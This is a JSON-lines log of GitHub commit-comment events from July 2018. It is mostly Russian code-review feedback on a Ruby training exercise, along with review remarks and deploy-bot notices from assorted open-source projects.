{"id":"7977521907","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736809,"position":33,"line":33,"path":"Lesson_1/right_triangle.rb","commit_id":"07c8fa7aff8e3878795deaa5f56208d0bfedcb4f","created_at":"2018-07-17T15:32:14Z","updated_at":"2018-07-17T15:32:14Z","author_association":"NONE","body":"в ТЗ: \"Также, если треугольник является при этом равнобедренным\"\r\nобрати внимание на \"Также\" - равнобедренность нужно проверять ТОЛЬКО, ЕСЛИ он прямоугольный, а у тебя она проверяется в любом случае - это нарушение ТЗ, надо исправлять (и для прямоугольного треугольника проверка сильно упростится)"}},"created_at":"2018-07-17T15:32:14Z"}
{"id":"7977527621","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736820,"position":31,"line":31,"path":"Lesson_1/right_triangle.rb","commit_id":"07c8fa7aff8e3878795deaa5f56208d0bfedcb4f","created_at":"2018-07-17T15:33:08Z","updated_at":"2018-07-17T15:33:08Z","author_association":"NONE","body":"треться проверка лишняя, если первые две выполнились, то третья тоже выполнилась и наоборот"}},"created_at":"2018-07-17T15:33:08Z"}
{"id":"7977531862","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736828,"position":6,"line":6,"path":"Lesson_1/quadratic_equation.rb","commit_id":"a8ce66daaa2d391063504d26e477d39aa6247d5f","created_at":"2018-07-17T15:33:46Z","updated_at":"2018-07-17T15:33:46Z","author_association":"NONE","body":"коэффициэнты могут быть не целочисленными\r\n"}},"created_at":"2018-07-17T15:33:46Z"}
{"id":"7977533417","type":"CommitCommentEvent","actor":{"login":"masters3d"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29736833,"position":200,"line":292,"path":"Sources/PackageDescription4/Package.swift","commit_id":"f2988906bff5362881d7dda17f740a658e662bb5","created_at":"2018-07-17T15:34:01Z","updated_at":"2018-07-17T15:34:01Z","author_association":"CONTRIBUTOR","body":"I see. I could never figure out how to get auto complete on the package file so the api surface is hard to find. \n\n> On Jul 17, 2018, at 7:17 AM, Ankit Aggarwal <notifications@github.com> wrote:\n> \n> The APIs with \"Item\" suffix are supposed to be an implementation detail. However, that is not very clear and users understand the _ prefix better. PackageDescription API v4.2 adds a _ prefix to such APIs which makes the distinction clearer.\n> \n> Please use the APIs which are intended for public use, for e.g.: https://github.com/apple/swift-package-manager/blob/master/Sources/PackageDescription4/Target.swift#L189\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-17T15:34:01Z"}
{"id":"7977538197","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736841,"position":13,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"a8ce66daaa2d391063504d26e477d39aa6247d5f","created_at":"2018-07-17T15:34:48Z","updated_at":"2018-07-17T15:34:48Z","author_association":"NONE","body":"про пробелы вокруг знаков арифметических уже писал"}},"created_at":"2018-07-17T15:34:48Z"}
{"id":"7977538698","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29736843,"position":84,"line":66,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T15:34:52Z","updated_at":"2018-07-17T15:34:52Z","author_association":"OWNER","body":"This ties up with the question from above. If storage load is an expensive execution, shouldn't we use memory instead ?"}},"created_at":"2018-07-17T15:34:52Z"}
{"id":"7977541708","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736847,"position":13,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"a8ce66daaa2d391063504d26e477d39aa6247d5f","created_at":"2018-07-17T15:35:21Z","updated_at":"2018-07-17T15:35:21Z","author_association":"NONE","body":"с возведением в степеньт все Ок\r\nоператор возведения в степень не рекомендуется выделять пробелами\r\n```ruby\r\n    c**2   # хорошо\r\n    c ** 2 # плохо\r\n```"}},"created_at":"2018-07-17T15:35:21Z"}
{"id":"7977541953","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29736850,"position":null,"line":null,"path":null,"commit_id":"964dd370ea52ae552902f1fa0f05412f37f3bf14","created_at":"2018-07-17T15:35:23Z","updated_at":"2018-07-17T15:35:23Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/b0d68cb99ca276652e97c7f215b0dad6396922af/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/964dd370ea52ae552902f1fa0f05412f37f3bf14/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-17T15:35:23Z"}
{"id":"7977542109","type":"CommitCommentEvent","actor":{"login":"thunayyanabdullah"},"repo":{"name":"seven332/UniFile"},"payload":{"comment":{"id":29736852,"position":null,"line":null,"path":null,"commit_id":"d4a06ae901b879f1b0e5400a76f9e97dc4f8f23f","created_at":"2018-07-17T15:35:25Z","updated_at":"2018-07-17T15:35:25Z","author_association":"NONE","body":"Fie"}},"created_at":"2018-07-17T15:35:25Z"}
{"id":"7977542409","type":"CommitCommentEvent","actor":{"login":"drigolin"},"repo":{"name":"swoole/swoole-src"},"payload":{"comment":{"id":29736853,"position":null,"line":null,"path":null,"commit_id":"942a81bde47e5578ad3ff146aa6aeadaccb2035a","created_at":"2018-07-17T15:35:28Z","updated_at":"2018-07-17T15:35:28Z","author_association":"NONE","body":"This commit didn't fix the issue of php_sockets.h issue for me.\r\nan explicit \r\n#define HAVE_SOCKET 1 need to be applied"}},"created_at":"2018-07-17T15:35:28Z"}
{"id":"7977543354","type":"CommitCommentEvent","actor":{"login":"danfrankj"},"repo":{"name":"airbnb/omniduct"},"payload":{"comment":{"id":29736856,"position":null,"line":null,"path":null,"commit_id":"9991f372dc8eb8102fad07dd93d4601f81eb1b7b","created_at":"2018-07-17T15:35:36Z","updated_at":"2018-07-17T15:35:36Z","author_association":"CONTRIBUTOR","body":"asking to learn... why flake8 > pycodestyle?"}},"created_at":"2018-07-17T15:35:36Z"}
{"id":"7977547413","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736867,"position":13,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"a8ce66daaa2d391063504d26e477d39aa6247d5f","created_at":"2018-07-17T15:36:14Z","updated_at":"2018-07-17T15:36:14Z","author_association":"NONE","body":"в руби приняты следующие правила именования:\r\n- имена методов и переменных записываются в стиле `snake_case` (также именуют и файлы)\r\n- константы записываются или `CamelCase` (обычно это имена классов и модулей), или `UPPER_SNAKE_CASE` (константы, объявляемые в классах почти всегда пишут именно так)"}},"created_at":"2018-07-17T15:36:14Z"}
{"id":"7977548013","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":29736870,"position":null,"line":null,"path":null,"commit_id":"70c35adb9f81d76fc41e9e3f353256e2a558da51","created_at":"2018-07-17T15:36:20Z","updated_at":"2018-07-17T15:36:20Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Bug : patcher le n° de version ezmaster dans le footer](https://trello.com/c/xIKdZFTO/449-bug-patcher-le-n-de-version-ezmaster-dans-le-footer)"}},"created_at":"2018-07-17T15:36:20Z"}
{"id":"7977549762","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736873,"position":18,"line":18,"path":"Lesson_1/quadratic_equation.rb","commit_id":"a8ce66daaa2d391063504d26e477d39aa6247d5f","created_at":"2018-07-17T15:36:36Z","updated_at":"2018-07-17T15:36:36Z","author_association":"NONE","body":"можно посчитать квадратный корень один раз, присвоить его значение переменной и далее использовать эту переменную, вместо того чтобы считать каждый раз\r\n"}},"created_at":"2018-07-17T15:36:36Z"}
{"id":"7977551280","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":29736875,"position":null,"line":null,"path":null,"commit_id":"d1629173e260cbd6ee6a273241138630eeb27e16","created_at":"2018-07-17T15:36:50Z","updated_at":"2018-07-17T15:36:50Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Implémenter le bouton pour la suppression d'une application dans ezmaster v5](https://trello.com/c/oN5clcMO/443-impl%C3%A9menter-le-bouton-pour-la-suppression-dune-application-dans-ezmaster-v5)"}},"created_at":"2018-07-17T15:36:50Z"}
{"id":"7977551501","type":"CommitCommentEvent","actor":{"login":"iamchrissmith"},"repo":{"name":"cgewecke/eth-gas-reporter"},"payload":{"comment":{"id":29736876,"position":null,"line":null,"path":null,"commit_id":"9073fe7ea0eb7a158de3edba4faee606e5ad33e4","created_at":"2018-07-17T15:36:53Z","updated_at":"2018-07-17T15:36:53Z","author_association":"CONTRIBUTOR","body":"@cgewecke I saw that you reverted the dupFunc PR.  Was there a bug or something further that needed to happen with it?"}},"created_at":"2018-07-17T15:36:53Z"}
{"id":"7977554884","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29736886,"position":17,"line":17,"path":"tests/TicTacToeTest.php","commit_id":"3ffac1b54136046406dd307d484db49ba64d8037","created_at":"2018-07-17T15:37:25Z","updated_at":"2018-07-17T15:37:25Z","author_association":"OWNER","body":"`$game->getCurrentPlayer()->getSymbol()`\r\nIsn't LoD breaking?"}},"created_at":"2018-07-17T15:37:25Z"}
{"id":"7977555460","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29736888,"position":23,"line":23,"path":"Lesson_1/quadratic_equation.rb","commit_id":"a8ce66daaa2d391063504d26e477d39aa6247d5f","created_at":"2018-07-17T15:37:30Z","updated_at":"2018-07-17T15:37:30Z","author_association":"NONE","body":"треться проверка не имеет смысла\r\nварианта всего три, первые 2 проверки отсекают 2 варианта\r\nздесь правильно использовать просто `else`"}},"created_at":"2018-07-17T15:37:30Z"}
{"id":"7977562227","type":"CommitCommentEvent","actor":{"login":"timomitchel"},"repo":{"name":"timomitchel/angular-tour-of-heroes"},"payload":{"comment":{"id":29736898,"position":null,"line":null,"path":null,"commit_id":"41b4daaf7adb101619e6936c142062a140bc2a8c","created_at":"2018-07-17T15:38:34Z","updated_at":"2018-07-17T15:38:34Z","author_association":"OWNER","body":"Wow incredible"}},"created_at":"2018-07-17T15:38:34Z"}
{"id":"7977565358","type":"CommitCommentEvent","actor":{"login":"JANSIT"},"repo":{"name":"JANSIT/hello-world"},"payload":{"comment":{"id":29736920,"position":null,"line":null,"path":null,"commit_id":"8ccd11e5cb2957de43eba22bd6e9bb824a1758bd","created_at":"2018-07-17T15:39:05Z","updated_at":"2018-07-17T15:39:05Z","author_association":"OWNER","body":"hgj"}},"created_at":"2018-07-17T15:39:05Z"}
{"id":"7977568195","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29736946,"position":14,"line":177,"path":"client/src/main/java/org/eclipse/hono/client/impl/AbstractSender.java","commit_id":"d80b5005252175f642d1d638e18add48aaf7581b","created_at":"2018-07-17T15:39:31Z","updated_at":"2018-07-17T15:39:31Z","author_association":"CONTRIBUTOR","body":"@calohmn sounds reasonable :+1: "}},"created_at":"2018-07-17T15:39:31Z"}
{"id":"7977569423","type":"CommitCommentEvent","actor":{"login":"bherr2"},"repo":{"name":"cns-iu/xmacroscope"},"payload":{"comment":{"id":29736955,"position":24,"line":94,"path":"packages/client-run/src/Start/StartPage.js","commit_id":"4dddc7448e086b51a4e9565d53e3776b4129abea","created_at":"2018-07-17T15:39:43Z","updated_at":"2018-07-17T15:39:43Z","author_association":"MEMBER","body":"@bryankennedy  We haven't done this yet, but these latitude / longitude values should be pulled from a zipcode -> lat/lng database. We used the 'zipcodes' npm module to do it in the past without too much issue."}},"created_at":"2018-07-17T15:39:43Z"}
{"id":"7977577674","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29736976,"position":8,"line":18,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T15:41:03Z","updated_at":"2018-07-17T15:41:03Z","author_association":"OWNER","body":"Can I call synchronously web3.sha3() ? I thought I couldn't so I did it myself to save time."}},"created_at":"2018-07-17T15:41:03Z"}
{"id":"7977580567","type":"CommitCommentEvent","actor":{"login":"jgraybrainstation"},"repo":{"name":"jgraybrainstation/solid-palm-tree"},"payload":{"comment":{"id":29736984,"position":null,"line":null,"path":null,"commit_id":"34689fafe2c57f2802af69a3ddf92fd5d696f731","created_at":"2018-07-17T15:41:30Z","updated_at":"2018-07-17T15:41:30Z","author_association":"OWNER","body":"this is bad and you should feel bad"}},"created_at":"2018-07-17T15:41:30Z"}
{"id":"7977581047","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29736987,"position":null,"line":null,"path":null,"commit_id":"6b5f6bd19cf6e5147bb593004076008a19cfe6e3","created_at":"2018-07-17T15:41:34Z","updated_at":"2018-07-17T15:41:34Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/b0d68cb99ca276652e97c7f215b0dad6396922af/.circleci/config.yml)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/964dd370ea52ae552902f1fa0f05412f37f3bf14/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-17T15:41:34Z"}
{"id":"7977581490","type":"CommitCommentEvent","actor":{"login":"tuanstar90208"},"repo":{"name":"tuanstar90208/stardog"},"payload":{"comment":{"id":29736990,"position":null,"line":null,"path":null,"commit_id":"615001c30be49d8141f6ab3fd57787bdefe7f595","created_at":"2018-07-17T15:41:38Z","updated_at":"2018-07-17T15:41:38Z","author_association":"OWNER","body":"已修改完成 不好意思!\n\nAlex Wang <notifications@github.com> 於 2018年7月17日週二 14:23 寫道：\n\n> hw2_part1 的網址給錯囉\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tuanstar90208/stardog/commit/615001c30be49d8141f6ab3fd57787bdefe7f595#commitcomment-29730272>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am7BOt9esfBj8u6gJ9XoS6paDaokpwKqks5uHYL9gaJpZM4VSQCH>\n> .\n>\n"}},"created_at":"2018-07-17T15:41:38Z"}
{"id":"7977582472","type":"CommitCommentEvent","actor":{"login":"kellykxr"},"repo":{"name":"kellykxr/solid-palm-tree"},"payload":{"comment":{"id":29736998,"position":null,"line":null,"path":null,"commit_id":"3c035dadff290fc96abd707d1fd228b43d75f36f","created_at":"2018-07-17T15:41:48Z","updated_at":"2018-07-17T15:41:48Z","author_association":"OWNER","body":"This isn't complete."}},"created_at":"2018-07-17T15:41:48Z"}
{"id":"7977590610","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29737057,"position":null,"line":null,"path":null,"commit_id":"8b1d59057d368e46c030e8713cadccd7cf711977","created_at":"2018-07-17T15:43:06Z","updated_at":"2018-07-17T15:43:06Z","author_association":"NONE","body":"Do we still need to ditch Ashmem tracking on O?\r\nEarlier rild crash and I found that commit, now it doesn't"}},"created_at":"2018-07-17T15:43:06Z"}
{"id":"7977594441","type":"CommitCommentEvent","actor":{"login":"techminto"},"repo":{"name":"freeCodeCamp/study-group-directory"},"payload":{"comment":{"id":29737064,"position":null,"line":null,"path":null,"commit_id":"8b2ac4f8f38dce551c4ce33b2f48e4f92eca40d1","created_at":"2018-07-17T15:43:42Z","updated_at":"2018-07-17T15:43:42Z","author_association":"NONE","body":"does this mean that we now have Shiraz in the list?"}},"created_at":"2018-07-17T15:43:42Z"}
{"id":"7977596154","type":"CommitCommentEvent","actor":{"login":"Freyja-Folkvangr"},"repo":{"name":"entel-garage/node-red-bluemix-starter-1"},"payload":{"comment":{"id":29737068,"position":null,"line":null,"path":null,"commit_id":"f8b0e61f21b25d69d37eef7b683e8959c01ab532","created_at":"2018-07-17T15:43:59Z","updated_at":"2018-07-17T15:43:59Z","author_association":"MEMBER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/7ffc64ce-53b8-457e-89e9-17e950cd29c7?env_id=ibm%3Ayp%3Aus-south \"testgiuliano\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5091715e-8af8-4f22-9005-465986e9de1a?env_id=ibm%3Ayp%3Aus-south \"testgiuliano\") deployed [node-red-bluemix-starter-1](https://github.com/entel-garage/node-red-bluemix-starter-1/releases/tag/deploy-ibm-yp-us-south-ENTEL-Corp-giuliano-20180717-154357 \"deploy-ibm-yp-us-south-ENTEL-Corp-giuliano-20180717-154357\") to [giuliano](https://console.bluemix.net/apps/b2ff2c25-bf76-4fef-b33d-6fa4ce5a0683?env_id=ibm:yp:us-south \"ibm:yp:us-south:ENTEL Corp:giuliano\"), including this commit"}},"created_at":"2018-07-17T15:43:59Z"}
{"id":"7977596393","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":29737069,"position":5,"line":66,"path":"src/msgs/messages2.sql","commit_id":"32ca23b4fc17d01c09e6400a41e313163ee4559a","created_at":"2018-07-17T15:44:01Z","updated_at":"2018-07-17T15:44:01Z","author_association":"MEMBER","body":"It is OK if v3 client connect to the v4 server. But in other case (new client and old server) we have:\r\n\r\nfb40\\temp\\x64\\Debug\\firebird>isql inet://s:\\Temp\\A.30.FDB\r\nDatabase: inet://s:\\Temp\\A.30.FDB, User: SYSDBA\r\nSQL> update t set calc = 1;\r\nStatement failed, SQLSTATE = 42000\r\nattempted update of read-only column <Missing arg #1 - possibly status vector overflow>\r\n"}},"created_at":"2018-07-17T15:44:01Z"}
{"id":"7977601069","type":"CommitCommentEvent","actor":{"login":"dalikim"},"repo":{"name":"parti-xyz/catan-web"},"payload":{"comment":{"id":29737077,"position":null,"line":null,"path":null,"commit_id":"2f924ebe3f8b6e32f2185bb3b8b585ae18980ab8","created_at":"2018-07-17T15:44:47Z","updated_at":"2018-07-17T15:44:47Z","author_association":"CONTRIBUTOR","body":"사용자를 지우기만 했네요. 우리가 사용자 탈퇴 처리할때 쓰는 rake 명령어 아시죠? 해당 코드를 리뷰해야해요. 그 리뷰 결과에 따라 위의 삭제 메소드가 달라질 수 있겠죠."}},"created_at":"2018-07-17T15:44:47Z"}
{"id":"7977602813","type":"CommitCommentEvent","actor":{"login":"sou-c"},"repo":{"name":"dsi-icl/optimise-ui"},"payload":{"comment":{"id":29737081,"position":null,"line":null,"path":null,"commit_id":"6c19782d81484ebd9159bdaa180acc3264aaafa5","created_at":"2018-07-17T15:45:03Z","updated_at":"2018-07-17T15:45:03Z","author_association":"CONTRIBUTOR","body":"you don't need Number. anymore; parseInt is globally available"}},"created_at":"2018-07-17T15:45:03Z"}
{"id":"7977608247","type":"CommitCommentEvent","actor":{"login":"MasterDuke17"},"repo":{"name":"MoarVM/MoarVM"},"payload":{"comment":{"id":29737094,"position":5,"line":389,"path":"src/strings/uthash.h","commit_id":"c56865594828bc19c9d9fd65e8ba49a4e55bed0a","created_at":"2018-07-17T15:45:52Z","updated_at":"2018-07-17T15:45:52Z","author_association":"CONTRIBUTOR","body":"From here to the end of the while looks like the indentation is off."}},"created_at":"2018-07-17T15:45:52Z"}
{"id":"7977611588","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29737100,"position":13,"line":null,"path":"testing/npapi-vlc/APKBUILD","commit_id":"25f857bdd494b38300e82207264d81ccd6d33527","created_at":"2018-07-17T15:46:24Z","updated_at":"2018-07-17T15:46:24Z","author_association":"MEMBER","body":"This is very wrong, such thing should never be merged."}},"created_at":"2018-07-17T15:46:24Z"}
{"id":"7977613495","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29737104,"position":75,"line":76,"path":"test/Remittance.js","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T15:46:42Z","updated_at":"2018-07-17T15:46:42Z","author_association":"OWNER","body":"I thought the deadline only applies for Alice to claiming the money back. "}},"created_at":"2018-07-17T15:46:42Z"}
{"id":"7977614228","type":"CommitCommentEvent","actor":{"login":"yyang2035"},"repo":{"name":"yyang2035/gittest"},"payload":{"comment":{"id":29737108,"position":3,"line":1,"path":"learngit.txt","commit_id":"8cc9a061b58f42ea2af9989c746c0b8218e20463","created_at":"2018-07-17T15:46:50Z","updated_at":"2018-07-17T15:46:50Z","author_association":"OWNER","body":"hha "}},"created_at":"2018-07-17T15:46:50Z"}
{"id":"7977614987","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29737111,"position":null,"line":null,"path":null,"commit_id":"8b1d59057d368e46c030e8713cadccd7cf711977","created_at":"2018-07-17T15:46:57Z","updated_at":"2018-07-17T15:46:57Z","author_association":"OWNER","body":"The patch for libinder to disable ashmem tracking is just replace call to ```acquire_object(proc, obj, who, **ashmem**)``` by ```acquire_object(proc, obj, who, **NULL**)```.\r\nInstead of do that in libbinder, I do it here. So we don't have to patch libbinder. Keeping that patch won't hurt though."}},"created_at":"2018-07-17T15:46:57Z"}
{"id":"7977615072","type":"CommitCommentEvent","actor":{"login":"Freyja-Folkvangr"},"repo":{"name":"entel-garage/node-red-bluemix-starter-1"},"payload":{"comment":{"id":29737112,"position":null,"line":null,"path":null,"commit_id":"f8b0e61f21b25d69d37eef7b683e8959c01ab532","created_at":"2018-07-17T15:46:58Z","updated_at":"2018-07-17T15:46:58Z","author_association":"MEMBER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/50a571c6-a3ad-4e2d-bb01-07256d1803b1?env_id=ibm%3Ayp%3Aus-south \"observatorio\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/e6226823-269c-48e4-be2a-79dfc959087e?env_id=ibm%3Ayp%3Aus-south \"observatorio\") deployed [node-red-bluemix-starter-1](https://github.com/entel-garage/node-red-bluemix-starter-1/releases/tag/deploy-ibm-yp-us-south-ENTEL-Corp-observatorio-20180717-154657 \"deploy-ibm-yp-us-south-ENTEL-Corp-observatorio-20180717-154657\") to [observatorio](https://console.bluemix.net/apps/84bade3d-74c4-44f1-bd8b-1ec80d73a782?env_id=ibm:yp:us-south \"ibm:yp:us-south:ENTEL Corp:observatorio\"), including this commit"}},"created_at":"2018-07-17T15:46:58Z"}
{"id":"7977615891","type":"CommitCommentEvent","actor":{"login":"yyang2035"},"repo":{"name":"yyang2035/gittest"},"payload":{"comment":{"id":29737116,"position":3,"line":1,"path":"learngit.txt","commit_id":"8cc9a061b58f42ea2af9989c746c0b8218e20463","created_at":"2018-07-17T15:47:06Z","updated_at":"2018-07-17T15:47:06Z","author_association":"OWNER","body":"yoyo"}},"created_at":"2018-07-17T15:47:06Z"}
{"id":"7977624929","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29737125,"position":null,"line":null,"path":null,"commit_id":"8b1d59057d368e46c030e8713cadccd7cf711977","created_at":"2018-07-17T15:48:32Z","updated_at":"2018-07-17T15:48:32Z","author_association":"NONE","body":"I know but just asking if we still need it again (in case of anything related to RIL crashes with ashmem member?)"}},"created_at":"2018-07-17T15:48:32Z"}
{"id":"7977629877","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/pakmail-franchising"},"payload":{"comment":{"id":29737138,"position":null,"line":null,"path":null,"commit_id":"f3a1630d3360da93c636f57b7fd65048f253992e","created_at":"2018-07-17T15:49:20Z","updated_at":"2018-07-17T15:49:20Z","author_association":"COLLABORATOR","body":"Created multidev environment [pakmail-franchising#ci-70](https://dashboard.pantheon.io/sites/8a4447b4-69fe-419a-b0ba-20c6317d8b0c#ci-70).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-70-pakmail-franchising.pantheonsite.io/)"}},"created_at":"2018-07-17T15:49:20Z"}
{"id":"7977631296","type":"CommitCommentEvent","actor":{"login":"Freyja-Folkvangr"},"repo":{"name":"entel-garage/node-red-bluemix-starter-1"},"payload":{"comment":{"id":29737140,"position":null,"line":null,"path":null,"commit_id":"177703557ac8e8180c780c913c550eddd15a0b70","created_at":"2018-07-17T15:49:34Z","updated_at":"2018-07-17T15:49:34Z","author_association":"MEMBER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/7ffc64ce-53b8-457e-89e9-17e950cd29c7?env_id=ibm%3Ayp%3Aus-south \"testgiuliano\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/5091715e-8af8-4f22-9005-465986e9de1a?env_id=ibm%3Ayp%3Aus-south \"testgiuliano\") deployed [node-red-bluemix-starter-1](https://github.com/entel-garage/node-red-bluemix-starter-1/releases/tag/deploy-ibm-yp-us-south-ENTEL-Corp-giuliano-20180717-154933 \"deploy-ibm-yp-us-south-ENTEL-Corp-giuliano-20180717-154933\") to [giuliano](https://console.bluemix.net/apps/370462b2-afa9-444a-a7f2-50a25bdff0db?env_id=ibm:yp:us-south \"ibm:yp:us-south:ENTEL Corp:giuliano\"), including this commit"}},"created_at":"2018-07-17T15:49:34Z"}
{"id":"7977634979","type":"CommitCommentEvent","actor":{"login":"junibrosas"},"repo":{"name":"gdi2290/angular-idle-preload"},"payload":{"comment":{"id":29737147,"position":null,"line":null,"path":null,"commit_id":"3b94a59a3e72d49f5f22e1e9acf0f239e4ee6241","created_at":"2018-07-17T15:50:12Z","updated_at":"2018-07-17T15:50:12Z","author_association":"NONE","body":"Did you for forget to publish your latest changes?"}},"created_at":"2018-07-17T15:50:12Z"}
{"id":"7977639266","type":"CommitCommentEvent","actor":{"login":"mrwacky42"},"repo":{"name":"jbarratt/serialized-hugo"},"payload":{"comment":{"id":29737155,"position":null,"line":null,"path":null,"commit_id":"ef476d151f38c5f7a336c115cc119aa09c254f1f","created_at":"2018-07-17T15:50:53Z","updated_at":"2018-07-17T15:50:53Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-17T15:50:53Z"}
{"id":"7977641494","type":"CommitCommentEvent","actor":{"login":"Cyvster"},"repo":{"name":"Cyvster/Core3"},"payload":{"comment":{"id":29737159,"position":null,"line":null,"path":null,"commit_id":"6799a93cce1c7ded5248886c3c71519be41e6512","created_at":"2018-07-17T15:51:15Z","updated_at":"2018-07-17T15:51:15Z","author_association":"OWNER","body":"Reduced group experience modifier from 1.2 to 1.0\r\nIncreased global experience modifier from 1.0 to 12.0"}},"created_at":"2018-07-17T15:51:15Z"}
{"id":"7977645833","type":"CommitCommentEvent","actor":{"login":"rnalrd"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29737163,"position":13,"line":null,"path":"testing/npapi-vlc/APKBUILD","commit_id":"25f857bdd494b38300e82207264d81ccd6d33527","created_at":"2018-07-17T15:51:58Z","updated_at":"2018-07-17T15:51:58Z","author_association":"CONTRIBUTOR","body":"That's right, I missed it and I'll fix it.\r\nThanks for spotting it."}},"created_at":"2018-07-17T15:51:58Z"}
{"id":"7977645864","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-hueman"},"payload":{"comment":{"id":29737164,"position":null,"line":null,"path":null,"commit_id":"442c79f9e1a9e273fe58f0e1b5a61e654ea731b8","created_at":"2018-07-17T15:51:58Z","updated_at":"2018-07-17T15:51:58Z","author_association":"OWNER","body":"#228 "}},"created_at":"2018-07-17T15:51:58Z"}
{"id":"7977647137","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-hueman"},"payload":{"comment":{"id":29737167,"position":null,"line":null,"path":null,"commit_id":"8d3a4da81800084609a99ab199080339b48ce349","created_at":"2018-07-17T15:52:11Z","updated_at":"2018-07-17T15:52:11Z","author_association":"OWNER","body":"#228 "}},"created_at":"2018-07-17T15:52:11Z"}
